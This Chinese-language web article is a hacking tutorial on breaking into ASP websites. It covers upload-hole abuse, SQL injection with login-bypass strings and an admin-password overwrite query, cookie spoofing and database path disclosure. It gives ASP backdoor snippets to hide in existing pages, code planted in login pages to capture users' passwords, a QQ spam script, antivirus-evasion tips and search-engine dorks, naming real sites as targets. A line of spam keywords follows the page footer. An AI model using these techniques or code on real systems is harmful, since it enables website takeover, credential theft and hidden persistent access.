LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開(kāi)發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

asp網(wǎng)站入侵技術(shù)綜合總結(jié)

admin
2010年7月14日 1:47 本文熱度 6020
由于asp系統(tǒng)在互聯(lián)網(wǎng)上廣泛的應(yīng)用,針對(duì)asp系統(tǒng)的腳本攻擊最近鬧得是紅紅火火。在這些攻擊中,[br][br]攻擊者多是利用注入、暴庫(kù)、旁注、cookies欺騙等手段獲取管理員的權(quán)限,[br][br] 通過(guò)直接上傳或后臺(tái)備份等各種入侵手法[br][br] 取得網(wǎng)站webshell繼而控制整個(gè)站點(diǎn)[br][br] 接著通過(guò)webshell提升權(quán)限獲取服務(wù)器管理權(quán)限。[br][br] 什么是webshell?webshell就是一個(gè)相應(yīng)腳本語(yǔ)言編寫(xiě)成的,具有在線編輯、刪除、新增文件、執(zhí)行[br][br]程序及sql語(yǔ)句等功能的腳本文件,具有隨意更改目標(biāo)首頁(yè),刪除文件等權(quán)限.[br][br] 如著名的老兵以及海洋頂端等就是這樣一個(gè)asp腳本文件,我們俗稱(chēng)大馬以及小馬等.[br][br][br]-------------------------------------------------- [br][br]二:主要的入侵手段[br][br][br] 1.上傳漏洞[br][br] 一:如典型的動(dòng)網(wǎng)上傳漏洞,我們直接訪問(wèn)上傳頁(yè)面。[br][br] 二:進(jìn)入網(wǎng)站后臺(tái)直接上傳腳本木馬,獲得webshell.[br][br] 因?yàn)橛行┚W(wǎng)站系統(tǒng)對(duì)管理員十分信任.進(jìn)入后臺(tái)后,只要找到上傳地點(diǎn).就能任意上傳腳本木馬.[br][br] 三:添加上傳類(lèi)型.[br] [br] 如果系統(tǒng)代碼限定了不允許上傳asp文件,那么我們可添加允許上傳asa cer等文件.然后將腳本木馬[br][br] 后綴名相應(yīng)的修改成asa cer.webshell一樣可以使用。[br][br][br] 四:通過(guò)后臺(tái)備份功能恢復(fù)asp后綴名[br][br] 如果無(wú)法上傳asp.asa.cer等后綴名文件。我們修改腳本木馬后綴名asp為jpg或者gif圖片后綴名[br][br] 上傳成功后.通過(guò)后臺(tái)備份數(shù)據(jù)庫(kù)功能恢復(fù)文件asp后綴名.[br][br] 五:抓包上傳[br][br] 通過(guò)抓取上傳真實(shí)地址以及管理員認(rèn)證數(shù)據(jù)cookies.[br][br] 然后通過(guò)明小子上傳腳本木馬.獲得webshell.[br][br][br] 其實(shí)上傳方法還有很多.不過(guò).也都是在基礎(chǔ)上發(fā)展而來(lái).只要我掌握了知識(shí).學(xué)習(xí)方法就十分的簡(jiǎn)單[br][br][br] [br]2.注入漏洞[br][br] 在眾多針對(duì)腳本系統(tǒng)的攻擊中,注入可謂是鬧得最紅火的攻擊手段了.[br][br] 目前引起sql注入的原因主要是程序員在編寫(xiě)帳腳本程序時(shí)對(duì)特殊字符過(guò)濾的不完全引起的.[br][br][br] 比如一個(gè)網(wǎng)址 [color=#0070af]http://xxx.com/asp?id=1[/color] [br][br] 是以id=數(shù)字形式結(jié)尾網(wǎng)址 我們通過(guò) 網(wǎng)址后加上個(gè) and 1=1 和 and 1=2 分別訪問(wèn)[br][br] 如果加上and 1=1 顯示正常頁(yè)面 加上 and 1=2 顯示出錯(cuò) 返回錯(cuò)誤頁(yè)面 [br][br] 則表示存在注入漏洞[br][br] 那么一個(gè)網(wǎng)址存在注入漏洞我們?cè)趺慈ダ媚?[br][br] 首先可以使用工具.[br][br] 比如明小子.阿d注入工具.猜解帳號(hào)以及密碼等重要信息.[br][br] 對(duì)于sql數(shù)據(jù)庫(kù)如果無(wú)法破解猜解出來(lái)的md5加密密碼[br][br] 那么我們可以用以下命令: [br][br] http://注入網(wǎng)址;update admin set password='新md5密碼' where password='舊md5密碼'-- [br][br][admin為表名.] [br][br] 更改管理員密碼[br][br] 3.cookie詐騙[br][br] cookie是什么呢?[br][br] cookie是你上網(wǎng)時(shí)由網(wǎng)站所為你發(fā)送的值記錄了你的一些資料,比如ip,姓名密碼等。[br][br] 怎樣詐騙呢?[br][br] 如果我們現(xiàn)在已經(jīng)知道了xx站管理員的站號(hào)和md5密碼了 但是破解 不出來(lái)密碼 (md5是加密后的一[br][br]個(gè)16位的密碼)[br][br] 我們就可以用cookie詐騙來(lái)實(shí)現(xiàn),把自己的id修改成管理員的,md5密碼也修改成他的,通過(guò)工具[br][br]修改cookie 這樣就答到了cookie詐騙的目的,系統(tǒng)就會(huì)認(rèn)定你就是管理員。[br][br][br] 4.旁注[br][br] 如果你的網(wǎng)站有難度.那么我們就入侵與你同一臺(tái)虛擬機(jī)的網(wǎng)站,通過(guò)入侵別人的網(wǎng)站[br][br] 拿到系統(tǒng)權(quán)限 也就能控制你的網(wǎng)站[br][br] 很多網(wǎng)站是存放在同一個(gè)虛擬機(jī)上的,也許某一臺(tái)虛擬機(jī)上有幾百個(gè)網(wǎng)站.那么我們只需要入侵[br][br] 入侵其中第一個(gè).從而控制全部的網(wǎng)站.就是這么簡(jiǎn)單![br][br][br] 5.暴庫(kù)[br][br] 一般而言,我們要獲取一個(gè)站點(diǎn)的shell,必須先獲得對(duì)方的后臺(tái)管理權(quán)限,要獲得對(duì)方的管理權(quán)限[br]當(dāng)然先要得到對(duì)方的管理員用戶以及密碼!得到對(duì)方管理員用戶各種密碼的方法有很多.[br][br] 通過(guò)下載數(shù)據(jù)庫(kù)后繼而破解md5加密信息.從而獲得管理員賬號(hào).[br][br] 但是一個(gè)網(wǎng)站的數(shù)據(jù)庫(kù)當(dāng)然不會(huì)讓你隨意下載到.[br][br] 那么我們?cè)趺慈フ覕?shù)據(jù)庫(kù)地址呢?[br][br] 最簡(jiǎn)單的就是暴庫(kù)了.[br][br] 通過(guò)服務(wù)器返回的錯(cuò)誤信息提示暴出數(shù)據(jù)庫(kù)地址的。[br][br] 但是,這漏洞并不見(jiàn),畢竟直接暴露出系統(tǒng)的數(shù)據(jù)庫(kù).這是多么危險(xiǎn)的事情呢![br][br] 暴庫(kù)方法:比如一個(gè)站的地址為 [br][br][color=#0070af]http://xxx.com/xxx.asp?id=1&id=2[/color] [br][br] 我們將com/dispbbs中間的/換成%5c 如果存在暴庫(kù)漏洞[br][br] 既可直接暴露出數(shù)據(jù)庫(kù)的絕對(duì)路徑 使用工具 迅雷等下載即可[br][br] 還有利用默認(rèn)的數(shù)據(jù)庫(kù)路徑 [color=#0070af]http://xxx.com/[/color] 后面加上 conn.asp 如果沒(méi)有修改默認(rèn)[br][br] 的數(shù)據(jù)庫(kù)路徑也可以得到數(shù)據(jù)庫(kù)的路徑(注意:這里的/也要換成%5c) [br][br] 那么暴庫(kù)的目的就是為了下載數(shù)據(jù)庫(kù)得到管理員賬號(hào)后上傳木馬腳本[br][br][br] 6.默認(rèn)漏洞[br][br] 同一個(gè)網(wǎng)站系統(tǒng)或許有成千上萬(wàn)的網(wǎng)站在使用這套系統(tǒng)[br][br] 而每一套網(wǎng)站系統(tǒng),當(dāng)然有它最初默認(rèn)的安裝路徑以及賬號(hào)密碼等[br][br] 我們通過(guò)大批量的搜索使用這套網(wǎng)站系統(tǒng)幾百萬(wàn)個(gè)網(wǎng)站[br][br] 找到那些沒(méi)有修改默認(rèn)設(shè)置的網(wǎng)站,沒(méi)有修改管理賬號(hào),沒(méi)有修改后臺(tái)登陸地址,沒(méi)有修改數(shù)據(jù)庫(kù)存[br]放地址的目標(biāo)[br][br] 進(jìn)行入侵![br][br]-------------------------------------------------- [br][br] 看完上面的介紹 基于根本.所謂的入侵也就利用這些常見(jiàn)的微乎其微的小漏洞.[br][br] 并沒(méi)有什么驚天動(dòng)地的 沒(méi)有什么所謂黑客 可以一下子沒(méi)有任何基礎(chǔ)原理和方法[br][br] 去入侵某個(gè)網(wǎng)站或服務(wù)器 [br][br] 那么我們是怎么入侵的? 無(wú)非的懂的多。知道的多.[br][br] 我們無(wú)非是比管理員更渴望知道.服務(wù)器.哪些地方不安全.哪些地方可以被我們所利用[br][br] 我們無(wú)非是比管理員更關(guān)心最新的系統(tǒng)漏洞[br][br] 我們無(wú)非是比管理員更勤勞的尋找系統(tǒng)的漏洞[br][br] 那么其實(shí),只要我們通過(guò)學(xué)習(xí)實(shí)踐操作掌握了這些基礎(chǔ)的知識(shí).[br][br] 所謂的入侵其實(shí)也就很簡(jiǎn)單.[br][br] 所以希望大家.學(xué)成以后.不要自以為是.[br][br] 不過(guò)就是些小漏洞,無(wú)非也就是管理員的疏忽,這又能怎樣?[br][br] 其實(shí)我們懂的還太少.連電腦也是由美國(guó)的華德·愛(ài)肯所發(fā)明[br][br] 在我們看天書(shū)一般的英文代碼時(shí).美國(guó)人就像看小說(shuō)一樣能明白代碼的意思[br][br] 試問(wèn) [br][br] 這是天與地的差距嗎?[br][br] 或許,這完全是心靈上的差別.[br]--------------------------------------------------[br][br]三:漏洞利用[br][br] 入侵指定的目標(biāo),如何去入侵呢?[br][br] 方法非常簡(jiǎn)單,我們尋找以上的基本漏洞[br][br] 只要存在這些漏洞,我們就發(fā)起攻擊[br][br] 為大家介紹一些這些漏洞的利用方法,也就是,找到這些漏洞,我們是為了干什么![br][br][br]1.上傳漏洞[br][br]上傳漏洞利用非常簡(jiǎn)單[br][br]就是從這個(gè)上傳漏洞,直接上傳我們的腳本木馬,從而拿到webshell。繼而控制目標(biāo)網(wǎng)站。[br][br]2.注入漏洞[br][br]注入漏洞分兩種不同類(lèi)型access數(shù)據(jù)庫(kù)與mssql數(shù)據(jù)庫(kù)[br][br]首先,直接利用方法是,猜解管理員賬號(hào)以及密碼。[br][br]然后網(wǎng)站登陸后臺(tái),從網(wǎng)站的后臺(tái)找到上傳點(diǎn)。從上傳點(diǎn),上傳腳本木馬。繼而控制目標(biāo)網(wǎng)站。[br][br][br]那么mssql數(shù)據(jù)庫(kù)。還可以猜解網(wǎng)站存放在服務(wù)器中的根目錄,通過(guò)差異備份[br][br]備份出一句話,然后通過(guò)一句話木馬客戶端,上傳腳本木馬,從而控制目標(biāo)網(wǎng)站。[br][br][br]3.cookie詐騙[br][br]在得到目標(biāo)網(wǎng)站管理員md5加密后的密碼,我們無(wú)法短時(shí)間破解出md5解密后的密碼[br][br]怎么辦呢?[br][br]我們直接通過(guò) 修改cookie相關(guān)信息[br][br]也就是把管理的賬號(hào),id,md5加密的密碼。修改到相應(yīng)的位置[br][br]這樣再登陸,系統(tǒng)就認(rèn)為我們就是管理員。[br][br]從而我們擁有了管理員的權(quán)限,[br][br]這個(gè)時(shí)候,我們就登陸后臺(tái)。找到上傳點(diǎn)。上傳腳本木馬。繼而控制目標(biāo)網(wǎng)站。[br][br][br]4.旁注[br][br]旁注,非常有意思。[br][br]簡(jiǎn)單的來(lái)說(shuō),網(wǎng)站的服務(wù)器,他是存放在特殊的地方,或者這么說(shuō)。不是私人人經(jīng)營(yíng)的[br][br]是由企業(yè)代為管理。[br][br]那么企業(yè)當(dāng)然不可能只管理你一個(gè)網(wǎng)站。[br][br]所以,一臺(tái)虛擬機(jī),可能有上百個(gè)網(wǎng)站,同時(shí)存放在這臺(tái)虛擬機(jī)上。[br][br]那么,我們?cè)囅耄遣皇峭ㄟ^(guò)入侵這臺(tái)虛擬機(jī),就達(dá)到控制這一百個(gè)網(wǎng)站的目的呢?[br][br]所以呀。就是這么簡(jiǎn)單。不管我們?nèi)肭诌@一百個(gè)網(wǎng)站中哪一個(gè)![br][br]只要我們達(dá)到入侵并控制了這臺(tái)網(wǎng)站服務(wù)器的目的。[br][br]我們就達(dá)到了控制這臺(tái)服務(wù)器一百個(gè)網(wǎng)站的目的[br][br] [br]5.暴庫(kù)[br][br]我們利用暴庫(kù)這個(gè)漏洞是為了什么呢?[br][br]顧名思義呀。暴庫(kù)就是暴出目標(biāo)的數(shù)據(jù)庫(kù)地址[br][br]想到這里大家都會(huì)笑了吧[br][br]我懂了。暴了數(shù)據(jù)庫(kù)地址[br][br]當(dāng)然是下載他的數(shù)據(jù)庫(kù)[br][br]然后通過(guò)數(shù)據(jù)庫(kù)得到管理員賬號(hào)[br][br]通過(guò)管理員賬號(hào),進(jìn)入后臺(tái),接著找上傳點(diǎn),接著上傳腳本木馬,接著呢?[br][br]當(dāng)然就是深入的控制目標(biāo)網(wǎng)站的服務(wù)器。[br][br][br]6.默認(rèn)漏洞[br][br]默認(rèn)漏洞,這個(gè)就笑呢[br][br]低級(jí)錯(cuò)誤嘛。但是卻廣泛的存在于網(wǎng)絡(luò)中[br][br]怎么利用呢?[br][br]默認(rèn)數(shù)據(jù)庫(kù),我們就利用得到管理賬號(hào)入侵。[br][br]默認(rèn)管理員賬號(hào)。我們就通過(guò)登陸后臺(tái)入侵 [p]就是這么簡(jiǎn)單。[/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][br]它和其他asp程序沒(méi)有本質(zhì)區(qū)別,只要是能運(yùn)行asp的空間就能運(yùn)行它,這種性質(zhì)使得asp木馬非常不易被發(fā)覺(jué)。它和其他asp程序的區(qū)別只在于asp木馬是入侵者上傳到目標(biāo)空間,并幫助入侵者控制目標(biāo)空間的asp程序。[/p] [p]關(guān)于制作..[/p] [p]建一個(gè)asp文件,內(nèi)容為 [br]找一個(gè)正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進(jìn)行hex編譯,插入圖片里,為了運(yùn)行成功,還要搜索%和%,將其變?yōu)?0,(不要替換自己asp的),再把jpg文件開(kāi)頭加入[/p] [p] [br]2. 名稱(chēng):整蠱網(wǎng)吧[/p] [p]先用精銳網(wǎng)吧輔助工具得到用戶名和密碼,然后用計(jì)算機(jī)管理聯(lián)結(jié)一臺(tái)機(jī)器,開(kāi)telnet,連接,開(kāi)共享,復(fù)制一個(gè)木馬過(guò)去運(yùn)行即可。 3.名稱(chēng):感受md5暴力破解的魅力[/p] [p]rainbowcrack用法先用rtgen生成庫(kù) "rtgen md5 byte 1 7 5 2400 40000 all"[/p] [p]1和7代表密碼最小和最大長(zhǎng)度[/p] [p]阿汀我再加個(gè)方法:[color=#355e9e]http://md5.rednoize.com/[/color] 在線破解[/p] [p]或者到[color=#355e9e]http://md5lookup.com/?category=01-3&searck=on[/color][/p] [p][br]4.很多時(shí)候我們做免殺木馬,不用懂匯編,用北斗加殼程序就能逃殺,還有很多加殼軟件,大家木馬加殼的時(shí)候最好多選擇不知名的加殼軟件。[/p] [p][br]5.名稱(chēng):隱蔽的插入型asp木馬[/p] [p](1)在我們要做手腳的asp文件里加入如下內(nèi)容[/p] [p]<%if request("action")="ok" then%> [br]shell代碼插在這里,最好是小馬,還要加密一下 <%end if%> [br]訪問(wèn)的時(shí)候在你作手腳的asp文件后面加上?action=ok,即可[/p] [p](2)另一種方法,在我們要做手腳的asp文件里加入如下內(nèi)容[/p] [p]<% [br]on error resume next [br]strfilename = request.querystring("filer") [br]set objstream = server.createobject("abodb.stream") [br]objstream.type = 1 [br]objstream.open [br]objstream.loadfromfile strfilename [br]objstream.savetofile server.mappath("ating.asp"),2 [br]%> [br]訪問(wèn)的時(shí)候在做手腳的asp文件后面加上?filer=xxx[/p] [p]xxx為你本地上傳的一個(gè)路徑如 c:ating123.asp[/p] [p]上傳后在做手腳的asp的同文件夾中有ating,asp[/p] [p][br](3)前提得到system權(quán)限,進(jìn)入網(wǎng)站目錄下一層[/p] [p]mkdir s…[/p] [p]copy ating.asp s…/[/p] [p]這樣殺毒軟件找不到的[/p] [p]訪問(wèn)http://網(wǎng)站/s…/ating.asp即可。[/p] [p][br]6. 工具[color=#355e9e]http://hack520.tengyi.cn/chaojiyonghu.rar[/color],此工具在該電腦生成一個(gè)超級(jí)用戶[/p] [p]用戶名為:hack 密碼110,在dos下和計(jì)算機(jī)管理器上看不到你建立的用戶,并且是刪除不掉的。[/p] [p]7.名稱(chēng):qq群腳本攻擊[/p] [p]打開(kāi)qq對(duì)話誆,復(fù)制消息,然后,下面的內(nèi)容保存為.vbs 文件,運(yùn)行即可。[/p] [p][/p] [p]set wshshell= wscript.createobject("wscript.shell") [br]wshshell.appactivate "qq信息攻擊腳本" [br]for i=1 to 20 [br]wscript.sleep 1000 [br]wshshell.sendkeys"^v" [br]wshshell.sendkeys i [br]wshshell.sendkeys "%s" [br]next[/p] [p][/p] [p]8.搜索:程序制作:萬(wàn)鵬 有免費(fèi)申請(qǐng)空間的,直接上傳asp馬即可。[/p] [p][br]9. 名稱(chēng):全面找出你站上的asp木馬[/p] [p](1) 用殺毒軟件[/p] [p](2) 用ftp客戶端軟件,點(diǎn)"工具"->"比較文件夾"[/p] [p](3) 用asplist2.0.asp上傳到站點(diǎn)空間查看,一般功能多的asp我估計(jì)就是asp木馬[/p] [p](4) 用工具beyond compare[/p] [p][br]10名稱(chēng):拓展思路拿dvbbs帳號(hào) "一個(gè)人的圣經(jīng)"的動(dòng)畫(huà)[/p] [p][br](1)以前獲得webshell后想進(jìn)入dvbbs的后臺(tái),想要管理員的密碼,可以這樣,[/p] [p]老辦法:[/p] [p]修改admin_login.asp得到明文dvbbs后臺(tái)密碼[/p] [p]在"username=trim(replace(request("username")這行后面[/p] [p][/p] [p]dim fsoobject [br]dim tsobject [br]set fsoobject = server.createobject("scripting.filesystemobject") [br]set tsobject = fsoobject.createtextfile(server.mappath("laner.txt")) [br]tsobject.write cstr(request("password")) [br]set fsoobject = nothing [br]set tsobject = nothing[/p] [p][/p] [p]只要管理員登陸后臺(tái),在目錄下就生成了laner.txt。[/p] [p][br](2)login.asp中case "login_chk"下:[/p] [p][/p] [p]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&request("username")&"text:"&request("password")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing[/p] [p][/p] [p]這樣laner.asp將獲得全部登陸人的登陸時(shí)間,用戶名和密碼。[/p] [p][br](3)如果你有自己的網(wǎng)站或者另外的webshell(強(qiáng)烈建議使用): 可以建立目錄laner,在里面建立一個(gè)空的laner.asp和如下代碼的rain.asp:[/p] [p][/p] [p]<%if request("n")<>"" and request("p")<>"" then [br]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&"name:"&request("n")&"password:"&request("p")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing [br]end if%>[/p] [p][/p] [p]11. 名稱(chēng):利用qq在線狀態(tài)抓鴿子肉雞[/p] [p]生成qq在線狀態(tài),把里面的地址改成木馬地址,發(fā)到論壇在login.asp那里插入一句:[/p] [p][/p] [p]response.write""response.write""[/p] [p][/p] [p]結(jié)果所有登陸人都會(huì)乖乖的把名字和密碼送到你的laner.asp 里[/p] [p][br]12. 動(dòng)畫(huà)名稱(chēng):媒體中國(guó)整站程序存在多處漏洞[/p] [p]漏洞程序:媒體中國(guó)整站程序(第一版)[/p] [p]官方網(wǎng)站:http://meiti.elgod.com/[/p] [p]漏洞: %5c(暴庫(kù)) 上傳 注入[/p] [p]上傳頁(yè)面:down1/upload.asp[/p] [p][br]13. 名稱(chēng):免費(fèi)電話+msh命令行工具[/p] [p][color=#355e9e]http://globe7.com/[/color] 打開(kāi)主頁(yè),點(diǎn)擊坐下角,free download,下載到本地,安裝,運(yùn)行后,會(huì)提示正在尋找你所在地區(qū)的區(qū)號(hào)。由于是國(guó)際長(zhǎng)途,注冊(cè)一個(gè)帳號(hào),送100美分,國(guó)內(nèi)計(jì)時(shí)0.01/分,你就有100分鐘可以白打。是一個(gè)帳號(hào)哦。[/p] [p]要注意的就是,固定電話,小靈通 形式為0086521123456 521本來(lái)時(shí)0521,要省略前面的零,手機(jī)號(hào)也是一樣。[/p] [p][br]14. 名稱(chēng):bo-blog的新漏洞[/p] [p]http://網(wǎng)址/index.php?job=../admin/ban[/p] [p]把其中"禁止搜索的詞"那部分另存出來(lái),里面的地址改完整,插入一句話木馬[/p] [p]15. 名稱(chēng):鉤魂者入侵傳奇私服[/p] [p]用百度 搜索 傳奇 inurl:tuku[/p] [p]或者 傳奇 inurl:wplm.htm[/p] [p]再或者 傳奇 inurl:coolsites.asp[/p] [p]友情鏈接里插入一句話木馬即可[/p] [p][br]16. 程序: 宏達(dá)企業(yè)整站上傳漏洞[/p] [p]官方主頁(yè):http://mu126.com/[/p] [p]漏洞頁(yè)面:/cx/upfile.asp (上傳漏洞)[/p] [p][br]17.無(wú)間盜郵箱,在修改密碼里,用戶名和密碼里添or=or[/p] [p][br]18.名稱(chēng): bbsxp5.16后臺(tái)得到webshell[/p] [p]bbsxp5.16過(guò)濾了 asp,asp,cdx,cer,擴(kuò)展名的文件上傳,就是在基本設(shè)置上添加上上傳類(lèi)型也不行,并禁止了修改數(shù)據(jù)備份數(shù)據(jù)名稱(chēng),我們可以把此網(wǎng)頁(yè)保存在本地,改源代碼上傳。[/p] [p][br]19.名稱(chēng):jhackj 2005年最新精典教程[/p] [p]下載看看吧,不錯(cuò),各大網(wǎng)站都有[/p] [p][br]20.名稱(chēng):省力入侵韓國(guó)肉雞[/p] [p]在啊d的掃描注入點(diǎn)項(xiàng),打開(kāi)這個(gè):[color=#355e9e]http://google.co.kr/advanced_search?hl=zh-cn[/color][/p] [p]這是高級(jí)搜索項(xiàng),關(guān)鍵字隨便寫(xiě)。這里我寫(xiě)asp?name= 設(shè)置為每頁(yè)顯示100條。[/p] [p]語(yǔ)種選擇韓文。搜索,很多sa.[/p] [p][br]21.名稱(chēng):任何網(wǎng)吧的管理系統(tǒng)破解[/p] [p]選智能abc,然后vv輸入,光標(biāo)后退兩步,按delete鍵 剛輸入的兩個(gè)vv刪除, 最后按inter鍵。[/p] [p][br]22.名稱(chēng):破解qq空間插入網(wǎng)頁(yè)木馬的代碼[/p] [p]現(xiàn)在騰訊已經(jīng)封了很多qq空間代碼了,就如以前[/p] [p][br][/p] [p][/p] [p][br]插入網(wǎng)頁(yè)木馬的代碼也早被封了,突破禁用的方法,代碼如下:[/p] [p][/p] [p]
[/p] [p][/p] [p]最后附上總結(jié)的[/p] [p][br]1.上傳漏洞[不多講][/p] [p]ps: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)"請(qǐng)登陸后使用",80%就有漏洞了![/p] [p]有時(shí)上傳不一定會(huì)成功,這是因?yàn)閏ookies不一樣.我們就要用wsockexpert取得cookies.再用domain上傳.[/p] [p][br]2.注入漏洞[不多講][/p] [p]ps:對(duì)md5密碼.有時(shí)我們不是哪么容易跑出來(lái).如果是[sql數(shù)據(jù)庫(kù)].那么我們可以用以下命令:[/p] [p]http://注入網(wǎng)址;update admin set password=\新md5密碼\ where password=\舊md5密碼\-- [admin為表名.][/p] [p][br]3.旁注,也就是跨站.[/p] [p]我們?nèi)肭帜痴緯r(shí)可能這個(gè)站堅(jiān)固的無(wú)懈可擊,我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn),然后在利用這個(gè)站點(diǎn)用提權(quán),嗅探等方法來(lái)入侵我們 要入侵的站點(diǎn)。,在這里有個(gè)難點(diǎn),就是一些服務(wù)器的絕對(duì)路徑經(jīng)過(guò)加密,這就看我們的本事了[/p] [p][br]4.暴庫(kù):把二級(jí)目錄中間的/換成%5c[/p] [p]ey:http://ahttc.edu.cn/otherweb/dz/bgs/bigclass.asp?bigclassname=職責(zé)范圍&bigclasstype=1[/p] [p]如果你能看到:\e:ahttc040901otherwebdzdatabaseixuer_studio.asa\不是一個(gè)有效的路徑。 確定路徑名稱(chēng)拼寫(xiě)是否正確,以及是否 連接到文件存放的服務(wù)器。[/p] [p]這樣的就是數(shù)據(jù)庫(kù)了。下載時(shí)用flashget換成.mdb格式的就行.[/p] [p][br]5.\or\=\or\這是一個(gè)可以連接sql的語(yǔ)名句.可以直接進(jìn)入后臺(tái)。我收集了一下。類(lèi)似的還有:[/p] [p]\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a[/p] [p][br]6.社會(huì)工程學(xué)。這個(gè)我們都知道吧。就是猜解。[/p] [p]ey:[color=#355e9e]http://neu.edu.cn/waishi/admin[/color][/p] [p]admin waishi[/p] [p][br]7.寫(xiě)入asp格式數(shù)據(jù)庫(kù)。就是一句話木馬[ ],常用在留言本.[/p] [p]ey:[color=#355e9e]http://ahsdxy.ah.edu.cn/ebook/db/ebook.asp[/color][這個(gè)就是asp格式的數(shù)據(jù)庫(kù)],再寫(xiě)入一句話木馬[/p] [p][br]8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(zhǎng)很菜.什么也不改.[/p] [p]ey:http://ahsdxy.ah.edu.cn/xiaoyoulu/index.asp[/p] [p]這個(gè)站用的是:杰出校友錄,源碼我下過(guò)了,[/p] [p]默認(rèn)數(shù)據(jù)庫(kù)/webshell路徑:databaseliangu_data.mdb 后臺(tái)管理:adm_login.asp 密碼及用戶名都是admin[/p] [p][br]9.默認(rèn)數(shù)據(jù)庫(kù)/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的webshell.[/p] [p][/p] [p]/databackup/dvbbs7.mdb [br]/bbs/databackup/dvbbs7.mdb [br]/bbs/data/dvbbs7.mdb [br]/data/dvbbs7.mdb [br]/bbs/diy.asp [br]/diy.asp [br]/bbs/cmd.asp [br]/bbs/cmd.exe [br]/bbs/s-u.exe [br]/bbs/servu.exe[/p] [p][/p] [p]工具:網(wǎng)站獵手 挖掘雞[/p] [p]ey:[color=#355e9e]http://cl1999.com/bbs/databackup/dvbbs7.mdb[/color][/p] [p][br]10.查看目錄法:人一些網(wǎng)站可以斷開(kāi)目錄,可以方問(wèn)目錄。[/p] [p]ey:[color=#355e9e]http://ujs168.com/shop/admin/[/color][/p] [p][color=#355e9e]http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/[/color][/p] [p]這樣我們可以找到數(shù)據(jù)庫(kù),下載不用我教吧[/p] [p][br]11.工具溢出:.asp?newsid= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的webshell][/p] [p][br]12.搜索引擎利用:[/p] [p](1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫(kù):database/flash.mdb 后臺(tái)/manager/[/p] [p](2).找網(wǎng)站的管理后臺(tái)地址:[/p] [p]site:xxxx.comintext:管理[/p] [p]site:xxxx.comintitle:管理 <關(guān)鍵字很多,自已找>[/p] [p]site:xxxx.cominurl:login[/p] [p](3).查找access的數(shù)據(jù)庫(kù),mssql、mysql的連接文件[/p] [p]allinurl:bbsdata[/p] [p]filetype:mdbinurl:database[/p] [p]filetype:incconn[/p] [p]inurl:datafiletype:mdb[/p] [p]我主不做了。。自已做做吧。。[/p] [p][br]13.cookie欺騙:[/p] [p]把自己的id修改成管理員的,md5密碼也修改成他的,用桂林老兵工具可以修改cookie。這個(gè)我就不多講了[/p]

該文章在 2010/7/14 1:47:04 編輯過(guò)
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專(zhuān)業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車(chē)隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開(kāi)發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類(lèi)企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷(xiāo)售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

黄频国产免费高清视频,久久不卡精品中文字幕一区,激情五月天AV电影在线观看,欧美国产韩国日本一区二区
亚洲Av电影在线观看不卡 | 日本亚洲成a人片在线观看 一本大道香蕉久在线播放29 | 亚洲免费高清性爱在线 | 亚洲AV永久精品一区二区在线 | 一级a一级a国产爰片免费免免 | 一区二区性生活观看 |